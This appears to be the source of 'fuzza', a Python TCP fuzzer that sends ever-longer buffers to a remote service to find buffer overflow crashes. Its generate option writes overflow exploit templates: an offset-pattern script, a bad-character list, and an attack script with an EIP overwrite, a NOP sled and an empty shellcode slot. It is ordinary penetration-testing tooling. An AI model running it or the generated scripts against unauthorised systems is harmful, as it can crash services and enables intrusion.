#!/usr/bin/env python
"""Customizable TCP fuzzer."""

from __future__ import print_function

import re
import os
import sys
import argparse
import socket
from time import sleep


# -------------------------------------------------------------------------------------------------
# GLOBALS
# -------------------------------------------------------------------------------------------------

CHAR = "A"
PREFIX = ""
SUFFIX = ""
INIT_MULTIPLIER = 100
ROUND_MULTIPLIER = 100
TIMEOUT = 30.0
DELAY = 1.0


# -------------------------------------------------------------------------------------------------
# HELPER FUNCTIONS
# -------------------------------------------------------------------------------------------------


def b2str(data):
    """Convert bytes into string type."""
    try:
        return data.decode("utf-8")
    except UnicodeDecodeError:
        pass
    try:
        return data.decode("utf-8-sig")
    except UnicodeDecodeError:
        pass
    try:
        return data.decode("ascii")
    except UnicodeDecodeError:
        return data.decode("latin-1")


def print_crashlog(prefix, suffix, char, buff):
    payload = prefix + buff + suffix
    print('\nRemote service (most likely) crashed at %s bytes of "%s"' % (str(len(buff)), char))
    print("Payload sent:\n%s" % (payload))


# -------------------------------------------------------------------------------------------------
# GENERATE FUNCTIONS
# -------------------------------------------------------------------------------------------------


def _script_pattern(host, port, prefix, suffix, init, exit):
    """Generate pattern overflow triaging scripts."""
    code_head = '''#!/usr/bin/env python
"""fuzza autogenerated."""

from __future__ import print_function
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

pattern = ""     # Add output from pattern_create.rb

try:
    print('Sending buffer...')
    s.connect(('{}', {}))
'''.format(
        host, port
    )

    code_init = ""
    if init is not None:
        for comm in init.split(","):
            d_send, d_expect = comm.split(":")
            if len(d_send) > 0:
                code_init += """    s.send('{}' + '\\r\\n')\n""".format(d_send)
            if len(d_expect) > 0:
                code_init += """    s.recv(1024)\n"""

    payload = """    s.send('{}' + pattern + '{}' + '\\r\\n')\n""".format(prefix, suffix)

    code_exit = ""
    if exit is not None:
        for comm in exit.split(","):
            d_send, d_expect = comm.split(":")
            if len(d_send) > 0:
                code_exit += """    s.send('{}' + '\\r\\n')\n""".format(d_send)
            if len(d_expect) > 0:
                code_exit += """    s.recv(1024)\n"""
    code_tail = """    print('done')
except:
    print('Could not connect')
"""
    return code_head + code_init + payload + code_exit + code_tail


def _script_badchars(host, port, char, prefix, suffix, length, init, exit):
    """Generate badchar overflow triaging scripts."""
    code_head = '''#!/usr/bin/env python
"""fuzza autogenerated."""

from __future__ import print_function
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

len_total    = {}      # Start at len_overflow and try out how much can be overwritten
len_overflow = {}      # Use pattern_create.rb and pattern_offset.rb to find exact offset
eip          = "B"*4     # Ignore for badchar detection
badchars = (
  "\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\\x0b\\x0c\\x0d\\x0e\\x0f\\x10"
  "\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a\\x1b\\x1c\\x1d\\x1e\\x1f\\x20"
  "\\x21\\x22\\x23\\x24\\x25\\x26\\x27\\x28\\x29\\x2a\\x2b\\x2c\\x2d\\x2e\\x2f\\x30"
  "\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x3a\\x3b\\x3c\\x3d\\x3e\\x3f\\x40"
  "\\x41\\x42\\x43\\x44\\x45\\x46\\x47\\x48\\x49\\x4a\\x4b\\x4c\\x4d\\x4e\\x4f\\x50"
  "\\x51\\x52\\x53\\x54\\x55\\x56\\x57\\x58\\x59\\x5a\\x5b\\x5c\\x5d\\x5e\\x5f\\x60"
  "\\x61\\x62\\x63\\x64\\x65\\x66\\x67\\x68\\x69\\x6a\\x6b\\x6c\\x6d\\x6e\\x6f\\x70"
  "\\x71\\x72\\x73\\x74\\x75\\x76\\x77\\x78\\x79\\x7a\\x7b\\x7c\\x7d\\x7e\\x7f\\x80"
  "\\x81\\x82\\x83\\x84\\x85\\x86\\x87\\x88\\x89\\x8a\\x8b\\x8c\\x8d\\x8e\\x8f\\x90"
  "\\x91\\x92\\x93\\x94\\x95\\x96\\x97\\x98\\x99\\x9a\\x9b\\x9c\\x9d\\x9e\\x9f\\xa0"
  "\\xa1\\xa2\\xa3\\xa4\\xa5\\xa6\\xa7\\xa8\\xa9\\xaa\\xab\\xac\\xad\\xae\\xaf\\xb0"
  "\\xb1\\xb2\\xb3\\xb4\\xb5\\xb6\\xb7\\xb8\\xb9\\xba\\xbb\\xbc\\xbd\\xbe\\xbf\\xc0"
  "\\xc1\\xc2\\xc3\\xc4\\xc5\\xc6\\xc7\\xc8\\xc9\\xca\\xcb\\xcc\\xcd\\xce\\xcf\\xd0"
  "\\xd1\\xd2\\xd3\\xd4\\xd5\\xd6\\xd7\\xd8\\xd9\\xda\\xdb\\xdc\\xdd\\xde\\xdf\\xe0"
  "\\xe1\\xe2\\xe3\\xe4\\xe5\\xe6\\xe7\\xe8\\xe9\\xea\\xeb\\xec\\xed\\xee\\xef\\xf0"
  "\\xf1\\xf2\\xf3\\xf4\\xf5\\xf6\\xf7\\xf8\\xf9\\xfa\\xfb\\xfc\\xfd\\xfe\\xff"
)

buffer = "{}"*len_overflow + eip + badchars

try:
    print('Sending buffer...')
    s.connect(('{}', {}))
'''.format(
        length, length - 30, char, host, port
    )

    code_init = ""
    if init is not None:
        for comm in init.split(","):
            d_send, d_expect = comm.split(":")
            if len(d_send) > 0:
                code_init += """    s.send('{}' + '\\r\\n')\n""".format(d_send)
            if len(d_expect) > 0:
                code_init += """    s.recv(1024)\n"""

    payload = """    s.send('{}' + buffer + '{}' + '\\r\\n')\n""".format(prefix, suffix)

    code_exit = ""
    if exit is not None:
        for comm in exit.split(","):
            d_send, d_expect = comm.split(":")
            if len(d_send) > 0:
                code_exit += """    s.send('{}' + '\\r\\n')\n""".format(d_send)
            if len(d_expect) > 0:
                code_exit += """    s.recv(1024)\n"""
    code_tail = """    print('done')
except:
    print('Could not connect')
"""
    return code_head + code_init + payload + code_exit + code_tail


def _script_attack(host, port, char, prefix, suffix, length, init, exit):
    """Generate attack overflow triaging scripts."""
    code_head = '''#!/usr/bin/env python
"""fuzza autogenerated."""

from __future__ import print_function
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

len_total    = {}               # Start at len_overflow and try out how much can be overwritten
len_overflow = {}               # Use pattern_create.rb and pattern_offset.rb to find exact offset
len_nop_sled = 16                 # Add nops if you need to encode your shellcode
eip          = "\\x90\\x90\\x90\\x90" # Change this (Keep in mind to put address in reverse order)
shellcode    = \"\"

padding = "C"*(len_total - len_overflow - len(str(eip)) - len_nop_sled - len(shellcode))
buffer  = "{}"*len_overflow + eip + \"\\x90\"*len_nop_sled + shellcode + padding

try:
    print('Sending buffer...')
    s.connect(('{}', {}))
'''.format(
        length, length - 30, char, host, port
    )

    code_init = ""
    if init is not None:
        for comm in init.split(","):
            d_send, d_expect = comm.split(":")
            if len(d_send) > 0:
                code_init += """    s.send('{}' + '\\r\\n')\n""".format(d_send)
            if len(d_expect) > 0:
                code_init += """    s.recv(1024)\n"""

    payload = """    s.send('{}' + buffer + '{}' + '\\r\\n')\n""".format(prefix, suffix)

    code_exit = ""
    if exit is not None:
        for comm in exit.split(","):
            d_send, d_expect = comm.split(":")
            if len(d_send) > 0:
                code_exit += """    s.send('{}' + '\\r\\n')\n""".format(d_send)
            if len(d_expect) > 0:
                code_exit += """    s.recv(1024)\n"""
    code_tail = """    print('done')
except:
    print('Could not connect')
"""
    return code_head + code_init + payload + code_exit + code_tail


def generate(directory, host, port, char, prefix, suffix, length, init, exit):
    """Generate overflow triaging scripts."""

    attack = _script_attack(host, port, char, prefix, suffix, length, init, exit)
    pattern = _script_pattern(host, port, prefix, suffix, init, exit)
    badchars = _script_badchars(host, port, char, prefix, suffix, length, init, exit)

    fp = open(os.path.join(directory, "attack.py"), "w")
    fp.write(attack)
    fp.close()

    fp = open(os.path.join(directory, "pattern.py"), "w")
    fp.write(pattern)
    fp.close()

    fp = open(os.path.join(directory, "badchars.py"), "w")
    fp.write(badchars)
    fp.close()


# -------------------------------------------------------------------------------------------------
# NETWORK FUNCTIONS
# -------------------------------------------------------------------------------------------------


def connect(host, port):
    """Connect to remote host."""
    # Create socket
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    except socket.error as msg:
        return (None, msg)
    # Get remote IP
    try:
        addr = socket.gethostbyname(host)
    except socket.gaierror as msg:
        s.close()
        return (None, msg)
    # Connect
    try:
        s.connect((addr, port))
    except socket.error as msg:
        s.close()
        return (None, msg)

    return (s, None)


def send(s, data):
    """Send data to socket."""
    try:
        s.send(data.encode() + "\r\n")
    except socket.error as msg:
        s.close()
        return (False, msg)

    return (True, None)


def receive(s, timeout, bufsize=1024):
    """Read one newline terminated line from a connected socket."""
    data = ""
    size = len(data)
    s.settimeout(timeout)

    while True:
        try:
            data += b2str(s.recv(bufsize))
        except socket.error as err:
            return (False, err)
        if not data:
            return (False, "upstream connection is gone while receiving")
        # Newline terminates the read request
        if data.endswith("\n"):
            break
        if data.endswith("\r"):
            break
        # Sometimes a newline is missing at the end
        # If this round has the same data length as previous, we're done
        if size == len(data):
            break
        size = len(data)
    # Remove trailing newlines
    data = data.rstrip("\r\n")
    data = data.rstrip("\n")
    data = data.rstrip("\r")
    return (True, data)


# -------------------------------------------------------------------------------------------------
# ARGS
# -------------------------------------------------------------------------------------------------


def _args_check_dir(value):
    """Check argument for valid directory."""
    if not os.path.isdir(str(value)):
        raise argparse.ArgumentTypeError('Directory "%s" does not exist.' % value)
    return value


def _args_check_init(value):
    """Check argument for valid init value."""
    for comm in value.split(","):
        if comm.find(":") == -1:
            raise argparse.ArgumentTypeError('"%s" is an invalid init value.' % value)
    return value


def _args_check_port(value):
    """Check argument for valid port number."""
    min_port = 1
    max_port = 65535

    try:
        intvalue = int(value)
    except ValueError:
        raise argparse.ArgumentTypeError('"%s" is an invalid port number.' % value)

    if intvalue < min_port or intvalue > max_port:
        raise argparse.ArgumentTypeError('"%s" is an invalid port number.' % value)
    return intvalue


def get_args():
    """Retrieve command line arguments."""
    parser = argparse.ArgumentParser(
        formatter_class=argparse.RawTextHelpFormatter,
        description="Customizable TCP fuzzing tool to test for remote buffer overflows.",
        epilog="""\
example:\n

  The following example illustrates how to use the initial communication by:
      1. Expecting the POP3 server banner
      2. Sending 'USER bob'
      3. Expecting a welcome message
  Additionally before sending the fuzzing characters, it is prepended with 'PASS ',
  so that the actuall fuzzing can be done on the password:
     1. Prefix payload with 'PASS '
     2. Send payload
  Lastly in order to also close the connection the '-e' opton is used
  (which works exactly as '-i') in order to send data after the payload.
     1. Expect any response from password payload
     2. Terminate the connection via QUIT
     3. Do not expect a follow up response

     $ fuzza -i ':.*POP3.*,USER bob:.*welcome.*' -e ':.*,QUIT:' -p 'PASS '
""",
    )
    parser.add_argument(
        "-v",
        "--version",
        action="version",
        version="%(prog)s 0.4.0 by cytopia",
        help="Show version information,",
    )
    parser.add_argument(
        "-c",
        "--char",
        metavar="char",
        required=False,
        default=CHAR,
        type=str,
        help='Buffer character to send as payload. Default: "' + CHAR + '"',
    )
    parser.add_argument(
        "-p",
        "--prefix",
        metavar="str",
        required=False,
        default=PREFIX,
        type=str,
        help="Prefix string to prepend to buffer. Empty by default.",
    )
    parser.add_argument(
        "-s",
        "--suffix",
        metavar="str",
        required=False,
        default=SUFFIX,
        type=str,
        help="Suffix string to append to buffer. Empty by default.",
    )
    parser.add_argument(
        "-l",
        "--length",
        metavar="int",
        required=False,
        default=INIT_MULTIPLIER,
        type=int,
        help="""Initial length to concat buffer string with x*char.
When using the '-g' option to generate reproducible attack scripts set this to the
value at which the crash occured in order to pre-populate the generated scripts.
"""
        + "Default: "
        + str(INIT_MULTIPLIER),
    )
    parser.add_argument(
        "-m",
        "--multiply",
        metavar="int",
        required=False,
        default=ROUND_MULTIPLIER,
        type=int,
        help="Round multiplier to concat buffer string with x*char every round. Default: "
        + str(ROUND_MULTIPLIER),
    )
    parser.add_argument(
        "-i",
        "--init",
        metavar="str",
        required=False,
        default=None,
        type=_args_check_init,
        help="""If specified, initializes communication before sending the payload in the form
'<send>:<expect>,<send>:<expect>,...'. Where <send> is the data to be sent
to the server and <expect> is the answer to be received from the server.
Either one of <send> or <expect> can be omitted if you expect something without
having sent data yet or need to send something for which there will not be an
answer. Multiple <send>:<expect> are supported and must be separated by a comma.
Regex supported for <expect> part.""",
    )
    parser.add_argument(
        "-e",
        "--exit",
        metavar="str",
        required=False,
        default=None,
        type=_args_check_init,
        help="""If specified, finalizes communication after sending the payload in the form
'<send>:<expect>,<send>:<expect>,...'. Where <send> is the data to be sent
to the server and <expect> is the answer to be received from the server.
Either one of <send> or <expect> can be omitted if you expect something without
having sent data yet or need to send something for which there will not be an
answer. Multiple <send>:<expect> are supported and must be separated by a comma.
Regex supported for <expect> part.""",
    )
    parser.add_argument(
        "-t",
        "--timeout",
        metavar="float",
        required=False,
        default=TIMEOUT,
        type=float,
        help="""Timeout in seconds for receiving data before declaring
the endpoint as crashed. Default: """
        + str(TIMEOUT),
    )
    parser.add_argument(
        "-d",
        "--delay",
        metavar="float",
        required=False,
        default=DELAY,
        type=float,
        help="Delay in seconds between each round. Default: " + str(DELAY),
    )
    parser.add_argument(
        "-g",
        "--generate",
        metavar="dir",
        required=False,
        default=None,
        type=_args_check_dir,
        help="""Generate custom python scripts based on your command line arguments
to reproduce and triage the overflow. Requires a directory to be specified where to
save the scripts to.""",
    )
    parser.add_argument("host", type=str, help="address to connect to.")
    parser.add_argument("port", type=_args_check_port, help="port to connect to.")
    return parser.parse_args()


# -------------------------------------------------------------------------------------------------
# MAIN ENTRYPOINT
# -------------------------------------------------------------------------------------------------


def main():
    """Start the program."""
    args = get_args()

    char = args.char
    imulti = args.length
    rmulti = args.multiply
    prefix = args.prefix
    suffix = args.suffix
    timeout = args.timeout
    delay = args.delay
    gen = args.generate

    multiplier = imulti
    buff = char * multiplier

    # Generate triage scripts
    if gen:
        generate(gen, args.host, args.port, char, prefix, suffix, args.length, args.init, args.exit)
        return

    # Fuzz
    while True:
        print("------------------------------------------------------------")
        print("%s * %s" % (char, str(multiplier)))
        print("------------------------------------------------------------")

        # Connect
        s, err = connect(args.host, args.port)
        if s is None:
            if multiplier == imulti:
                print(err, file=sys.stderr)
                sys.exit(1)
            else:
                print_crashlog(prefix, suffix, char, buff)
                sys.exit(0)

        # Initial communication
        if args.init is not None:
            for comm in args.init.split(","):
                d_send, d_expect = comm.split(":")
                # Send data?
                if len(d_send) > 0:
                    print("Init Sending:  %s" % (d_send))
                    succ, err = send(s, d_send)
                    if not succ:
                        if multiplier == imulti:
                            print(err, file=sys.stderr)
                            sys.exit(1)
                        else:
                            print_crashlog(prefix, suffix, char, buff)
                            sys.exit(0)
                # Expect data?
                if len(d_expect) > 0:
                    print("Init Awaiting: %s" % (d_expect))
                    succ, d_recv = receive(s, timeout, 1024)
                    if not succ:
                        if multiplier == imulti:
                            print(d_recv, file=sys.stderr)
                            sys.exit(1)
                        else:
                            print_crashlog(prefix, suffix, char, buff)
                            sys.exit(0)
                    print("Init Received: %s" % (d_recv))
                    if d_expect != d_recv and not bool(re.search(d_expect, d_recv)):
                        print_crashlog(prefix, suffix, char, buff)
                        sys.exit(0)

        # Send payload
        print('Sending "%s" + "%s"*%s + "%s"' % (prefix, char, multiplier, suffix))
        buff = char * multiplier
        payload = prefix + buff + suffix
        succ, err = send(s, payload)
        if not succ:
            if multiplier == imulti:
                print(err, file=sys.stderr)
                sys.exit(1)
            else:
                print_crashlog(prefix, suffix, char, buff)
                sys.exit(0)

        # Exit communication
        if args.exit is not None:
            for comm in args.exit.split(","):
                d_send, d_expect = comm.split(":")
                # Send data?
                if len(d_send) > 0:
                    print("Exit Sending:  %s" % (d_send))
                    succ, err = send(s, d_send)
                    if not succ:
                        if multiplier == imulti:
                            print(err, file=sys.stderr)
                            sys.exit(1)
                        else:
                            print_crashlog(prefix, suffix, char, buff)
                            sys.exit(0)
                # Expect data?
                if len(d_expect) > 0:
                    print("Exit Awaiting: %s" % (d_expect))
                    succ, d_recv = receive(s, timeout, 1024)
                    if not succ:
                        if multiplier == imulti:
                            print(d_recv, file=sys.stderr)
                            sys.exit(1)
                        else:
                            print_crashlog(prefix, suffix, char, buff)
                            sys.exit(0)
                    print("Exit Received: %s" % (d_recv))
                    if d_expect != d_recv and not bool(re.search(d_expect, d_recv)):
                        print_crashlog(prefix, suffix, char, buff)
                        sys.exit(0)

        s.close()
        sleep(delay)
        multiplier = multiplier + rmulti


if __name__ == "__main__":
    # Catch Ctrl+c and exit without error message
    try:
        main()
    except KeyboardInterrupt:
        print()
        sys.exit(1)
